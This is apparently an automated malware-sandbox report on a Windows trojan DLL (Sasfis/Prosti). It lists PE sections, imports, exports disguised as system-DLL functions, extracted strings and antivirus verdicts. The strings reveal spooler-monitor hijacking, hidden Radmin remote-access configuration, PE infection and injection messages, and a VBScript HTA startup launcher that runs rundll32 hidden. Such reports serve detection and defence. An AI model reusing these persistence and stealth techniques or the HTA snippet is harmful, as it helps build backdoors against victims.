Static Analysis

PE Compile Time

1992-06-20 01:22:17

PE Imphash

ba694797a91dfe791ab791c148c863ad

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
CODE 0x00001000 0x0001fc68 0x0001fe00 7.66496381647
DATA 0x00021000 0x00000304 0x00000400 4.69946397202
BSS 0x00022000 0x00000a09 0x00000000 0.0
.idata 0x00023000 0x000009e0 0x00000a00 4.74963164364
.edata 0x00024000 0x00000537 0x00000600 5.04491828462
.reloc 0x00025000 0x00000ca0 0x00000e00 6.47558706989
.rsrc 0x00026000 0x00000200 0x00000200 4.23838758755

Resources

Name Offset Size Language Sub-language File type
RT_RCDATA 0x000260c0 0x000000f0 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_RCDATA 0x000260c0 0x000000f0 LANG_NEUTRAL SUBLANG_NEUTRAL data

Imports

Library kernel32.dll:
0x43e730b4 DeleteCriticalSection
0x43e730b8 LeaveCriticalSection
0x43e730bc EnterCriticalSection
0x43e730c4 VirtualFree
0x43e730c8 VirtualAlloc
0x43e730cc LocalFree
0x43e730d0 LocalAlloc
0x43e730d4 GetTickCount
0x43e730dc GetVersion
0x43e730e0 GetCurrentThreadId
0x43e730e4 GetThreadLocale
0x43e730e8 GetStartupInfoA
0x43e730ec GetModuleFileNameA
0x43e730f0 GetLocaleInfoA
0x43e730f4 GetCommandLineA
0x43e730f8 FreeLibrary
0x43e730fc ExitProcess
0x43e73100 WriteFile
0x43e73108 RtlUnwind
0x43e7310c RaiseException
0x43e73110 GetStdHandle
Library user32.dll:
0x43e73118 GetKeyboardType
0x43e7311c MessageBoxA
0x43e73120 CharNextA
Library advapi32.dll:
0x43e73128 RegQueryValueExA
0x43e7312c RegOpenKeyExA
0x43e73130 RegCloseKey
Library kernel32.dll:
0x43e73138 TlsSetValue
0x43e7313c TlsGetValue
0x43e73140 TlsFree
0x43e73144 TlsAlloc
0x43e73148 LocalFree
0x43e7314c LocalAlloc
Library advapi32.dll:
0x43e73158 RegSetValueExA
0x43e7315c RegQueryValueExA
0x43e73160 RegOpenKeyExA
0x43e73164 RegEnumValueA
0x43e73168 RegEnumKeyExA
0x43e7316c RegDeleteValueA
0x43e73170 RegDeleteKeyA
0x43e73174 RegCreateKeyExA
0x43e73178 RegCloseKey
0x43e7317c OpenProcessToken
0x43e73180 LookupPrivilegeValueA
0x43e73188 AdjustTokenPrivileges
Library kernel32.dll:
0x43e73190 lstrcpyA
0x43e73194 WriteFile
0x43e73198 VirtualProtect
0x43e7319c VirtualFree
0x43e731a0 VirtualAlloc
0x43e731a4 TerminateProcess
0x43e731a8 Sleep
0x43e731ac SetFileTime
0x43e731b0 SetFilePointer
0x43e731b4 SetFileAttributesA
0x43e731b8 SetCurrentDirectoryA
0x43e731bc RemoveDirectoryA
0x43e731c0 ReadFile
0x43e731c4 OpenProcess
0x43e731c8 MoveFileExA
0x43e731cc MapViewOfFile
0x43e731d0 LoadLibraryA
0x43e731d4 GetTickCount
0x43e731d8 GetSystemDirectoryA
0x43e731dc GetProcAddress
0x43e731e0 GetModuleHandleA
0x43e731e4 GetModuleFileNameA
0x43e731e8 GetLastError
0x43e731ec GetFileTime
0x43e731f0 GetFileSize
0x43e731f4 GetFileAttributesA
0x43e731fc GetCurrentProcessId
0x43e73200 GetCurrentProcess
0x43e73204 GetCurrentDirectoryA
0x43e73208 GetCommandLineA
0x43e7320c FreeLibrary
0x43e73210 FindFirstFileA
0x43e73214 FindClose
0x43e7321c FileTimeToDosDateTime
0x43e73220 DeleteFileA
0x43e73224 CreateThread
0x43e73228 CreateMutexA
0x43e7322c CreateFileMappingA
0x43e73230 CreateFileA
0x43e73234 CreateDirectoryA
0x43e73238 CopyFileA
0x43e7323c CloseHandle
Library user32.dll:
0x43e73244 MessageBoxA
Library advapi32.dll:
0x43e7324c StartServiceA
0x43e73250 QueryServiceStatus
0x43e73254 OpenServiceA
0x43e73258 OpenSCManagerA
0x43e7325c DeleteService
0x43e73260 ControlService
0x43e73264 CloseServiceHandle

Exports

Ordinal Address Name
40 0x43e705b4 AcsHlpAttemptConnection
39 0x43e705ec AcsHlpN624
38 0x43e70618 AcsHlpNbConnection
37 0x43e7064c AcsHlpNo942
36 0x43e70678 AcsHlpNoteNewConnection
44 0x43e6f830 DllEntry
43 0x43e6f874 DllEntry2
45 0x43e70b48 DllImport
46 0x43e6f394 DllService
47 0x43e6f814 Dllrun
29 0x43e6fee0 GetFileVersionInfoA
28 0x43e6ff14 GetFileVersionInfoB766
27 0x43e6ff4c GetFileVersionInfoByHandle
26 0x43e6ff88 GetFileVersionInfoE886
25 0x43e6ffc0 GetFileVersionInfoExW
24 0x43e6fff8 GetFileVersionInfoS661
23 0x43e70030 GetFileVersionInfoSizeA
22 0x43e70068 GetFileVersionInfoSizeE173
21 0x43e700a4 GetFileVersionInfoSizeExW
19 0x43e7011c GetFileVersionInfoSizeW
20 0x43e700e0 GetFileVersionInfoSizeW955
17 0x43e7018c GetFileVersionInfoW
18 0x43e70154 GetFileVersionInfoW382
41 0x43e6fd70 InitializePrintMonitor2
42 0x43e70820 MakeInst
16 0x43e701c0 V350
15 0x43e701e8 VerFindFileA
13 0x43e70248 VerFindFileW
14 0x43e70218 VerFindFileW923
12 0x43e70278 VerI524
11 0x43e702a0 VerInstallFileA
9 0x43e70304 VerInstallFileW
10 0x43e702d0 VerInstallFileW834
8 0x43e70334 VerL242
7 0x43e7035c VerLanguageNameA
5 0x43e703c4 VerLanguageNameW
6 0x43e70390 VerLanguageNameW499
4 0x43e703f8 VerQ805
3 0x43e70420 VerQueryValueA
1 0x43e70484 VerQueryValueW
2 0x43e70450 VerQueryValueW337
35 0x43e706b0 W658
34 0x43e706d8 WSAttemptAutodialAddr
33 0x43e70710 WSAttemptAutodialN932
32 0x43e70748 WSAttemptAutodialName
31 0x43e70780 WSN224
30 0x43e707a8 WSNoteSuccessfulHostentLookup
This program must be run under Win32
.idata
.edata
P.reloc
P.rsrc
YZ]_^[
~KxI[)
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
_^[YY]
_^[YY]
_^[YY]
~wpib[TMF?81*#
{tmf_XQJC<5.'
xqjc\UNG@92+$
|ung`YRKD=6/(!
rkd]V!=3V_h%{ty
\Efw{bE
zwpif[TMG?9
?/3sAKIR|feM
UN4%UGOKPe|mb
$47' =&8
SW]p~%
0kd]2&
4:;e2;4gp
lu1FOx;>1P
c\UNGA
KD=6/)
,kd]VOI
}vohaZSM
zsle^WPIB;5
3uwpib[TMF?81*#
_XQJC<5.'
G@92+$
yrkd]VOI
a.S-ER7C)L
;F-GN
[1M6?k1+#
{XmW_XQ$CS5G'S
sqPc\UNG-9W+P
u!g@Y{K
]9O:AY3E%S
o8a[SeEL70)F
{sle~WPI.;X-B6
M*?Y1D#u
_5Q/CX5O'R
@qZclU|G`9
Y K==F/G!Y
]%O1Ai3
a-S#EZ7^)K
WPI';Y-GV
wpib[bMf?
Q/CP5G'f
G`9K+P
KD=6/F!u
k"]WOUAX3,%p
a5S?EQ7B)A
IC;"-j
fwpib[aMr?
Q-CR5G'R
xqkcXUJG@92+$
=p/f!S
OI!Z3,%
}vohaZSLE>70)"
leFWPIR;5-&
kd]VOHA:3,
[s^.!/K
L}Bx`Z
Cje{tY(
GSxSCDJ
LW[i{He~Z#
K3X_bAK
?BDleO
jSpgRPVY
{ioer]D
qAR,<(
R^LT*,;o_
BW*;&\6
oJ~^us
X|H{_i
`y^3$JlT^@L
F1nBg`a
e7mwQt\O
yb`FX]^
-bVlFE&
wTl"EY
& bg5<
e<(Xxg
DfZyFc
_y?c bE
LBZDN,g
3dYvdj
Bmg($hZR
#.ca:w
#s*qiGPt
WpA8yH
_7g'Cv
nj/Bc,
[ZWS?-
~c5BpoF!
rupHr.
TVL=;Z-o
v150Fsc
-z{3R%
N_Cufq
B)Ob<
ZlM^q*e,,E
6Z"UT!D3
.;Dk]|<Jk
=oPn6}
an^:Z4
a)tl}sh
'X5#e=
)5=9)V
Mi{mFvh
ywu~5&
:k8BGWVf
sDm?
^%a#wp
=S?\d:
@f1b`$
35V6rLoZ
-n9Vb
S1:rb'=
poGoHL
?"sv!]Gm
ZwH'Ew
Hul[!~1`
yN5UyN
URGA+ia
! e,u?K\1u
Xt/yI|
0~u\<T
cdvf1N
ND[gwJ[
+D& 3:}
"7;Ee\(]
=2*9^a
[Gdaz}+^6n
%-1z&bHJ
q[{WY)J
JB1KOc
:x]V`2?
i(rUP}
<{N ]k
9gbInR~W
je8Nkm
q}JSLzKM5$
uXm&l$(Ch
\gOAN`'
eB"YgN9
")lU,&ez
Y~" V:
NVrabA
p9V'/+
v _xw4
gDVKKZ806
BI,l'i
6'u:G,
q*P-;)
p\16+4(
FV_TKN}
9?$SJ
=j>/AEb
_N :;^
/gely&
Pc,"8&
kSSM@:=5.
wpdaQVBCK<8--
NGBDWbmB2W_
tBCmRbv
<4#+7<[
HV%K~I'
-4}G*4
kXLTRH
J<wuOu
cH\Ow@
JKHlaPq
LJhH~#
_Cy~dhf
C5E~K}
G\wh#0
6wqIb[T
F?81b#
._XQIC=
~wpib[TMF?81*#
{tmf_XQJC<5.'
xqjc\UNG@92+$
|ung`YRKD=6/(!
yrkd]VOHA:3,%
}vohaZSLE>70)"
zsle^WPIB;4-&
~wpib[TMF?81*#
{tmf_XQJC<5.'
xqjc\UNG@92+$
|ung`YRKD=6/(
zsle^3>,1;4-gk`tDq
&(5jLTd#
EGOUBp^oe
9&;G,UV
)3= \6cde4!?I
pkd]VOI
ohaZSLE>70)"
zsle^WQ
~wpib[TMF?9
{tmf_XQJC<5.'!
|ung`YRKD<
yrkd]VOHA:3,%
leFWPIH;5-&
~wpib[TMF?81*#
{tmf_XQJC<5.'
xqjc\UNG@92+$
|ung`YRKD=6/(!
yrkd]VOHA:3,%
}vohaZSLE>70)"
zsle^WPIB;4-&
~wpib[TMF?81*#
{tmf_XQJC<5.'
xqjc\UNG@92+$
|ung`YRKD=6/(!
yrkd]VOHA:3,%
Qi`n5^w'
NQ/#:7.
nIOyRA
;Wgu,*
F@lg)(6'*
EG|jtbF7
G@UV=.9
/eQ_I}v
`;&2='
|kjiVZ1
GW*;<L
5|xdxK_
tJfV@UI9
ZEx^zJ
pCg|rC@_
_G_cnHpYM
OxR6D]5
[${7Uy
Rf7)0?.
yn{bhWK
on]^k@=
);jE'j
'0ZL0R
xab9\;
/(U4LQq$
2Lp_8N
OQ\z]8|e
MG4\4[AYE
8'?6T`.{`%
+vqCt@
CS]akI
rn~u3j%P
*wblzp
xc[TML
rz@4KRTt
bLd9{~
s:jol"E
p}=DH~
W!kb`W
=D[?pZPH
lIi:P9
k>'])Oo9_e
o(YgU5
D2T<&~B
R5Fiw;p
hyHs:Sw
iz;$2FK
{=J^%Q
"4\KCZ
{cY3=t
sHYNbmt
8UwPMZa
WWMUV>
@5PrE?
ZS=[6/a
+I(EX2Y$if
$fBWCk^0b
<n9;,@
n@\]2
`~FH!s
&`TF}c
Nk*{/&
rYV38enWP
j,DO0""
'&(fJ|
@pz#BG
~t%3~[
:cTPHLpRq
Fs'xkG
cbE::33
aXTto8_n
IWl0>o
]nm-Y"
~vptP#BM<
&9`Emt](
rZEiCg
IGbI/C
r*V:?)
BJ];unl
^&Sx7.
Ek_&AI
S8E^HT
?R+Ry^V
Yj^VXt"`iq
#;p9*
H-%\pw
k,lYnO
9s(\`U
AWqq~@}
2T&nIO
3T!U3L=
P},0l-O
@?%07!
"%1\[AI
5Cjtf`
cnU$I5
8+33@a!
\(,b$)N
3AW%pl"\
Y/oliV
73<7#{
jTIrk.
5eT%B/
&TRg--x
zL%{.1p%6
$.OTTn
#o=Vy}
[FWB4w
Y2+#3
{5bvQe6
YVC7`?
+I2e_w
%e/gm`]
4/WR#O
}m=_7x@`4
pxpx`o
y I()uO
W7RNM
IRBT::Yd
gTf'\x'
6wqYb[T
F?81b#
_XQIC=
PSAPI.dll
EnumProcesses
EnumProcessModules
GetModuleBaseNameA
GetModuleFileNameExA
GetModuleBaseNameW
GetModuleFileNameExW
GetModuleInformation
EmptyWorkingSet
QueryWorkingSet
InitializeProcessForWsWatch
GetMappedFileNameA
GetDeviceDriverBaseNameA
GetDeviceDriverFileNameA
GetMappedFileNameW
GetDeviceDriverBaseNameW
GetDeviceDriverFileNameW
EnumDeviceDrivers
GetProcessMemoryInfo
QueryServiceStatusEx
advapi32.dll
advapi32.dll
ChangeServiceConfig2A
advapi32.dll
CreateServiceA
SystemRoot
:\Recycler\
C:\Recycled
:\Recycled\
C:\$RECYCLE.BIN
:\$RECYCLE.BIN\
SeDebugPrivilege
tracert.exe
\com\NOLOG
com\comb.dll
com\comb.dll
\Temp\comb.dll
_^[YY]
CreateProcessA
kernel32.dll
- Initialization Error!
Program Warnning
_^[YY]
GetProcAddress
kernel32.dll
LoadLibraryA
$Z]_^[
kernel32.dll
_^[YY]
kernel32.dll
kernel32.dll
GetProcAddress
LoadLibraryA
VirtualAlloc
kernel32.dll
LoadLibraryA
GetProcAddress
SYSTEM32
SYSWOW64
Global\||
Get Failed!!!!!
QQQQQQQQSVW
Total Import Dlls:
GetMemory failed. --err: %d\n", GetLastError()
TotalLen needed:
Space Available:
BIGGEST Space Available:
Memory Scan RawDataAddr...
[V] Modify PE file Successfully
rundll32.exe "
" JustForTest
PE infected and test SuccessFully
PE Replaced SuccessFully
InitializePrintMonitor2
Dllrun
spoolerlogs\spooler.xml
spoolerlogs
C:\Load.hta
SYSTEM\CurrentControlSet\Services\NetDDE\DllForInstall
ForTest.dll
DllImport
SYSTEM\CurrentControlSet\Control\Print\Monitors\SCSI Port Monitor\Driver
com\comb.dll
SystemDrive
\AppPatch\
C:\Temp
C:\Temp\AppPatch\
comb.dll
spoolsv.exe
svchost.exe
scsimon.dll
ComBack.Dll
QQQQQQSV
QQQQQQQQS
Size:
Loaded:
Size:
Loaded:
QQQQQQ3
Radmin.bin
RegSrvc.exe
Regsrvc
SOFTWARE\RAdmin\v1.01\ViewType\Installed
SOFTWARE\RAdmin\v1.01\ViewType\Data
SYSTEM\RAdmin\v2.0\Server\parameters\DisableTrayIcon
SYSTEM\RAdmin\v2.0\Server\parameters\AskUser
SYSTEM\RAdmin\v2.0\Server\parameters\EnableLogFile
SYSTEM\RAdmin\v2.0\Server\parameters\EnableEventLog
SYSTEM\RAdmin\v2.0\Server\parameters\FilterIp
SYSTEM\RAdmin\v2.0\Server\parameters\Port
SYSTEM\RAdmin\v2.0\Server\parameters\Parameter
%systemroot%\system32\RegSrvc.exe /service
Registry Scan Service
RegSrvc
Regsrvc Started
SYSTEM\CurrentControlSet\Services\RegSrvc
update
spoolsv.exe
svchost.exe
SYSTEM32
SYSWOW64
SYSTEM\CurrentControlSet\Services\NetDDE\
\ServiceExe
Spooler
winspool.drv
OpenPrinterA
ClosePrinter
SYSTEM\CurrentControlSet\Services\Spooler\
SystemRoot
\system32\spoolsv.exe
%SystemRoot%\system32\spoolsv.exe
Spoolsv.exe
ImagePath
scsimon.dll
SYSTEM\CurrentControlSet\Control\Print\Monitors\SCSI Port Monitor\Driver
SpoolerGroup
ObjectName
LocalSystem
Performance\Library
winspool.drv
DependOnService
SYSTEM\CurrentControlSet\Control\Print\Monitors\SCSI Port Monitor\Driver
scsimon.dll
Falied to Set Spooler Registry
rundll32
Spooler Dll Already Installed
Installing Spooler
Spooler
Spooler Dll Not Copied
spoolsv.exe
Spooler Running ok
Description
DisplayName
Loads files to memory for later printing.
Print Spooler Service
Spooler Dll SuccessFullly Installed.
Spooler Dll Install Failed.
QQQQQ3
SYSTEM\CurrentControlSet\Services\NetDDE\Disabled\F6
ProgramFiles
\Internet Explorer\iexplore.exe
Svchost FailTimes:
svchost.exe
spoolsv.exe
SYSTEM\CurrentControlSet\Services\NetDDE\Disabled\F6
SpoolerFailTimes:
Writing Hta
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup
\Startup.hta
<Script lAnguAgE=VBScript>: window.movETo 1112,9999
YY="ript.ShEll":Set WS=CreateObject("WSc"+YY):WS.Run "rundll32.exe ""
"" Install", 0
window.rESizETo 9,9:window.cloSE:</Script>
Timer Sec:
SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
SYSTEM\CurrentControlSet\Services\NetDDE\SysDll
SYSTEM\CurrentControlSet\Services\NetDDE\SysDll\
spoolsv.exe
scsimon.dll
usbmon.dll
QQQQQS3
spoolsv.exe
com\pdrv.dll
_Final_
Not Initialized Ok
Spooler
spoolsv.exe
Start Working
svchost.exe
AppLoad
Dllrun
QQQQS3
RealHost:
HostPID:
AcSvcst.dll
spoolsv.exe
rundll32
_Final_
DllService
Start To InJect
DllService
version.dll
GetFileVersionInfoA
GetFileVersionInfoB766
GetFileVersionInfoByHandle
GetFileVersionInfoE886
GetFileVersionInfoExW
GetFileVersionInfoS661
GetFileVersionInfoSizeA
GetFileVersionInfoSizeE173
GetFileVersionInfoSizeExW
GetFileVersionInfoSizeW955
GetFileVersionInfoSizeW
GetFileVersionInfoW382
GetFileVersionInfoW
VerFindFileA
VerFindFileW923
VerFindFileW
VerI524
VerInstallFileA
VerInstallFileW834
VerInstallFileW
VerL242
VerLanguageNameA
VerLanguageNameW499
VerLanguageNameW
VerQ805
VerQueryValueA
VerQueryValueW337
VerQueryValueW
rasadhlp.dll
AcsHlpAttemptConnection
AcsHlpN624
AcsHlpNbConnection
AcsHlpNo942
AcsHlpNoteNewConnection
WSAttemptAutodialAddr
WSAttemptAutodialN932
WSAttemptAutodialName
WSN224
WSNoteSuccessfulHostentLookup
SystemDrive
Start AddImport
Dllrun
Dllrun
Runtime error at 00000000
0123456789ABCDEF
=;'*2\f
]oybmL
4\[A}UT3`i
!)5*<.Hc@Dkcb`T
qLLrXih
!L$-$5*-IdHR~}cI#
0,#MPe^F[5wuo
'39$>1Uc
DOu~Jh
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
GetThreadLocale
GetStartupInfoA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
ExitProcess
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
kernel32.dll
TlsSetValue
TlsGetValue
TlsFree
TlsAlloc
LocalFree
LocalAlloc
advapi32.dll
SetSecurityDescriptorDacl
RegSetValueExA
RegQueryValueExA
RegOpenKeyExA
RegEnumValueA
RegEnumKeyExA
RegDeleteValueA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
OpenProcessToken
LookupPrivilegeValueA
InitializeSecurityDescriptor
AdjustTokenPrivileges
kernel32.dll
lstrcpyA
WriteFile
VirtualProtect
VirtualFree
VirtualAlloc
TerminateProcess
SetFileTime
SetFilePointer
SetFileAttributesA
SetCurrentDirectoryA
RemoveDirectoryA
ReadFile
OpenProcess
MoveFileExA
MapViewOfFile
LoadLibraryA
GetTickCount
GetSystemDirectoryA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLastError
GetFileTime
GetFileSize
GetFileAttributesA
GetEnvironmentVariableA
GetCurrentProcessId
GetCurrentProcess
GetCurrentDirectoryA
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
DeleteFileA
CreateThread
CreateMutexA
CreateFileMappingA
CreateFileA
CreateDirectoryA
CopyFileA
CloseHandle
user32.dll
MessageBoxA
advapi32.dll
StartServiceA
QueryServiceStatus
OpenServiceA
OpenSCManagerA
DeleteService
ControlService
CloseServiceHandle
ImportDll.dll
AcsHlpAttemptConnection
AcsHlpN624
AcsHlpNbConnection
AcsHlpNo942
AcsHlpNoteNewConnection
DllEntry
DllEntry2
DllImport
DllService
Dllrun
GetFileVersionInfoA
GetFileVersionInfoB766
GetFileVersionInfoByHandle
GetFileVersionInfoE886
GetFileVersionInfoExW
GetFileVersionInfoS661
GetFileVersionInfoSizeA
GetFileVersionInfoSizeE173
GetFileVersionInfoSizeExW
GetFileVersionInfoSizeW
GetFileVersionInfoSizeW955
GetFileVersionInfoW
GetFileVersionInfoW382
InitializePrintMonitor2
MakeInst
VerFindFileA
VerFindFileW
VerFindFileW923
VerI524
VerInstallFileA
VerInstallFileW
VerInstallFileW834
VerL242
VerLanguageNameA
VerLanguageNameW
VerLanguageNameW499
VerQ805
VerQueryValueA
VerQueryValueW
VerQueryValueW337
WSAttemptAutodialAddr
WSAttemptAutodialN932
WSAttemptAutodialName
WSN224
WSNoteSuccessfulHostentLookup
0"0*020:0B0J0R0Z0b0j0r0z0
9'929:9D9N9X9n9t9
:":(:5:::_:i:s:}:
060;0@0
0X1a1{1
2,2o2x2
3(3.3@3X3d3l3
4#4)4/4b4
4D5L5R5X5e5k5
7$70787
7#8<8U8f8{8
<9=I=_=}=
>">*>@>X>f>
>#?P?Y?
2L2T2_2
3h3x3~3
40484d4o4
5%5*5J5O5q5
;*;j;q;
=%=1=;=b=w=
=)>G>Q>\>p>x>
?!???D?W?c?p?
0"0*020:0B0J0R0Z0b0
1"1*121:1B1J1R1Z1b1j1r1z1
7"707I7V7[7h7m7z7
8!8.838@8E8R8W8d8i8v8{8
:.;G;S;`;r;z;
;/<n<~<W=
=]>l>x>
0(0:0V0
4c4q4{4
>f>-?C?_?
2-222=2R2
9A9N9S9
:7:C:`:
:.;a;q;
<'<4<F<
3!4g4.7
;9;I;l;
<-<=<d<r<{<
==+=7=C=O=Z=f=p=~=
>&>A>R>Y>_>i>t>|>
??(?9?Y?
#2H2M2R2\2a2g2l2q2
3 3%363;3K3Q3a3g3x3
5(595O5[5`5j5o5v5{5
9:9N9a9
5[5m5C6O6\6n6
6/7S7d7
8%83898N8T8m8u8
8Z9b9s9~9
:':4:9:N:S:^:h:r:w:
;,;C;M;`;e;o;t;
<?<l<v<{<
4?5[5p5u5
6(6-6>6C6R6^6c6h6r6
:(:-:?:D:R:X:]:
=;=@=T=a=u=
>%>8>R>e>w>
1&1Y1q1v1
222>2S2b2s2
3#3-3B3e3k3
686O6U6`6m6
7H7[7k7
939O9T9Z9_9e9j9o9t9y9~9
;(;L;V;\;a;
;3=\=o=t=
? ?3?t?
0,0<0K0g0
2)2=2_2s2
4"4?4H4P4^4j4p4x4
4-5<5B5G5b5h5{5
56-6B6g6}6
8 8;8H8`8
;&;8;=;h;
<4<=<B<_<p<v<
>7>^>i>
?%?M?R?]?
01060A0i0n0y0
1"1-1U1Z1e1
2)2I2N2Y2y2~2
353:3E3]3b3m3
4!4&414Q4V4a4
5%505H5V5|5
6)6M6R6]6y6~6
7!7I7N7Y7
:1:Q:Y:|:
:S;f;x;|;
< <,<7<<<G<M<S<
(0,000
ImportDll
AdvRemote
MemFuc
SysUtils2
UTypes
System
SysInit
KWindows
PEUtils2
ImageHlp
WinntService2
WinSvc
RegMini
}Buf_DIY
]Buf_CoolDll
rasadhlpEx
oversionEx
[InstallPE
LoadMsl
jjjjjj
'&%$#+*,-.
DVCLAL
PACKAGEINFO
Antivirus Signature
Lionic Clean
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
CTX dll.trojan.aklrihi
ALYac Gen:Trojan.ExplorerHijack.iC5@aKlRihi
Cylance Unsafe
Zillya Trojan.Sasfis.Win32.25546
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (D)
K7GW Trojan ( 005690671 )
K7AntiVirus Trojan ( 005690671 )
huorong Trojan/Injector.bli
Baidu Clean
VirIT Backdoor.Win32.Generic.CCLQ
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Delf.AJO
APEX Malicious
Paloalto Clean
ClamAV Win.Trojan.Sasfis-73
Alibaba Clean
NANO-Antivirus Trojan.Win32.Sasfis.inuxo
ViRobot Clean
MicroWorld-eScan Gen:Trojan.ExplorerHijack.iC5@aKlRihi
Tencent Trojan.Win32.Sasfis.pa
Sophos Troj/Delf-HOM
F-Secure Trojan.TR/ATRAPS.Gen
DrWeb Trojan.MulDrop3.19480
VIPRE Gen:Trojan.ExplorerHijack.iC5@aKlRihi
TrendMicro Clean
McAfeeD ti!F962FBD1D380
Trapmine Clean
CMC Clean
Emsisoft Gen:Trojan.ExplorerHijack.iC5@aKlRihi (B)
Ikarus Backdoor.Win32.Prosti
GData Win32.Trojan.PSE.19YCTOZ
Jiangmin Trojan/Sasfis.lzc
Webroot W32.Malware.gen
Avira TR/ATRAPS.Gen
Antiy-AVL Trojan/Win32.Sasfis
Kingsoft malware.kb.a.999
Gridinsoft Trojan.Win32.Downloader.oa!s1
Xcitium Clean
Arcabit Trojan.ExplorerHijack.E33CEF
SUPERAntiSpyware Clean
ZoneAlarm Troj/Delf-HOM
Microsoft Backdoor:Win32/Prosti.L
Google Detected
AhnLab-V3 Trojan/Win32.Sasfis.R3331
Acronis suspicious
VBA32 Trojan.Sasfis
TACHYON Trojan/W32.DP-Sasfis.140828
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/Genetic.gen
Zoner Clean
TrendMicro-HouseCall Trojan.Win32.VSX.PE04C9V
Rising Backdoor.Prosti!8.280 (TFE:3:577pK4pfyyV)
Yandex Trojan.GenAsa!YOsF5jLpW/g
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Sasfis.AQW!tr
DeepInstinct MALICIOUS
alibabacloud Worm:Win/Delf.25d92ca9
IRMA Signature
Trend Micro SProtect (Linux) Clean
Avast Core Security (Linux) Win32:MalwareX-gen [Bd]
C4S ClamAV (Linux) Win.Trojan.Sasfis-73
Trellix (Linux) Clean
Sophos Anti-Virus (Linux) Troj/Delf-HOM
Bitdefender Antivirus (Linux) Gen:Trojan.ExplorerHijack.iC5@aKlRihi
G Data Antivirus (Windows) Virus: Gen:Trojan.ExplorerHijack.iC5@aKlRihi (Engine A), Win32.Trojan.PSE.10038YY (Engine B)
WithSecure (Linux) Trojan:W32/Generic.avtd!fsmind
ESET Security (Windows) a variant of Win32/Delf.AJO trojan
DrWeb Antivirus (Linux) Trojan.MulDrop3.19480
ClamAV (Linux) Win.Trojan.Sasfis-73
eScan Antivirus (Linux) Gen:Trojan.ExplorerHijack.iC5@aKlRihi(DB)
Kaspersky Standard (Windows) Trojan.Win32.Sasfis.aqwf
Emsisoft Commandline Scanner (Windows) Gen:Trojan.ExplorerHijack.iC5@aKlRihi (B)
Cuckoo

We're processing your submission... This could take a few seconds.